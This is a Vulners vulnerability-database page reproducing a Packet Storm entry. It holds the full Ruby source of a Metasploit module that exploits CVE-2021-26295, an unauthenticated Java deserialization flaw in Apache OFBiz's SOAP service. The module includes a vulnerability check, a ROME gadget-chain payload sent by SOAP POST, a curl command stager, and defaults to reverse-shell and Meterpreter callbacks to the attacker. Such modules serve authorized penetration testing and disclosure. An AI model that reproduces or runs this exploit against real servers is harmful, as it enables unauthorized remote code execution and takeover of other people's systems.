Vulners
Lucene search
Apache OFBiz SOAP Java Deserialization
🗓️ 06 Apr 2021 00:00:00Reported by Spencer McIntyreType 
packetstorm🔗 packetstormsecurity.com👁 551 Views
| Reporter | Title | Published | Views | Family All 25 |
|---|---|---|---|---|
 | Apache OFBiz SOAP Java Deserialization Exploit | 7 Apr 202100:00 | – | zdt |
 | Exploit for Deserialization of Untrusted Data in Apache Ofbiz | 13 May 202113:28 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Apache Ofbiz | 24 Mar 202108:25 | – | githubexploit |
| Exploit for Deserialization of Untrusted Data in Apache Ofbiz | 23 Mar 202115:25 | – | githubexploit |
 | CVE-2020-9496 | 15 Jul 202000:00 | – | attackerkb |
| CVE-2021-26295 | 22 Mar 202100:00 | – | attackerkb |
 | Apache OFBiz Remote Code Execution (CVE-2021-26295) | 30 Mar 202100:00 | – | nessus |
 | CVE-2021-26295 | 22 Mar 202109:43 | – | circl |
 | Apache OFBiz 代码问题漏洞 | 22 Mar 202100:00 | – | cnnvd |
 | Apache OFBiz RCE Vulnerability | 22 Mar 202100:00 | – | cnvd |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
include Msf::Exploit::JavaDeserialization
XML_NS = {
'serResponse' => 'http://ofbiz.apache.org/service/',
'soapenv' => 'http://schemas.xmlsoap.org/soap/envelope/'
}.freeze
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Apache OFBiz SOAP Java Deserialization',
'Description' => %q{
This module exploits a Java deserialization vulnerability in Apache
OFBiz's unauthenticated SOAP endpoint /webtools/control/SOAPService for
versions prior to 17.12.06.
},
'Author' => [
'yumusb', # original PoC
'Spencer McIntyre', # metasploit module
'wvu' # metasploit module
],
'References' => [
[ 'CVE', '2021-26295' ],
[ 'URL', 'https://github.com/yumusb/CVE-2021-26295-POC/blob/main/poc.py' ],
[ 'URL', 'https://issues.apache.org/jira/browse/OFBIZ-12167' ]
],
'DisclosureDate' => '2021-03-22', # NVD publish date
'License' => MSF_LICENSE,
'Platform' => ['unix', 'linux'],
'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],
'Privileged' => false,
'Targets' => [
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/reverse_python_ssl'
}
}
],
[
'Linux Dropper',
{
'Platform' => 'linux',
'Arch' => [ARCH_X86, ARCH_X64],
'Type' => :linux_dropper,
'DefaultOptions' => {
'CMDSTAGER::FLAVOR' => :curl,
'PAYLOAD' => 'linux/x64/meterpreter_reverse_https'
}
}
]
],
'DefaultTarget' => 1,
'DefaultOptions' => {
'SSL' => true
},
'Notes' => {
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
}
)
)
register_options([
Opt::RPORT(8443),
OptString.new('TARGETURI', [true, 'Base path', '/'])
])
end
def check
# Send an empty serialized object
res = send_request_soap('')
unless res
return CheckCode::Unknown('Target did not respond to check.')
end
messages = {}
res.get_xml_document.xpath('//soapenv:Envelope/soapenv:Body/serResponse:serResponse/serResponse:map-HashMap/serResponse:map-Entry', XML_NS).each do |entry|
key = entry.xpath('serResponse:map-Key/serResponse:std-String/@value', XML_NS).to_s
messages[key] = entry.xpath('serResponse:map-Value/serResponse:std-String/@value', XML_NS).to_s
end
if messages['errorMessage']&.start_with?('Problem deserializing object from byte array')
return CheckCode::Vulnerable('Target can deserialize arbitrary data.')
end
CheckCode::Safe('Target cannot deserialize arbitrary data.')
end
def exploit
print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
case target['Type']
when :unix_cmd
execute_command(payload.encoded)
when :linux_dropper
execute_cmdstager
end
end
def execute_command(cmd, _opts = {})
vprint_status("Executing command: #{cmd}")
res = send_request_soap(
# framework/webapp/lib/rome-0.9.jar
generate_java_deserialization_for_command('ROME', 'bash', cmd)
)
unless res && res.code == 200
fail_with(Failure::UnexpectedReply, "Failed to execute command: #{cmd}")
end
print_good("Successfully executed command: #{cmd}")
end
def send_request_soap(data)
send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path, '/webtools/control/SOAPService'),
'ctype' => 'text/xml',
'data' => <<~XML
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header/>
<soapenv:Body>
<ser>
<map-HashMap>
<map-Entry>
<map-Key>
<cus-obj>#{Rex::Text.to_hex(data, '')}</cus-obj>
</map-Key>
<map-Value>
<std-String value="http://#{Faker::Internet.domain_name}"/>
</map-Value>
</map-Entry>
</map-HashMap>
</ser>
</soapenv:Body>
</soapenv:Envelope>
XML
)
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
06 Apr 2021 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.94237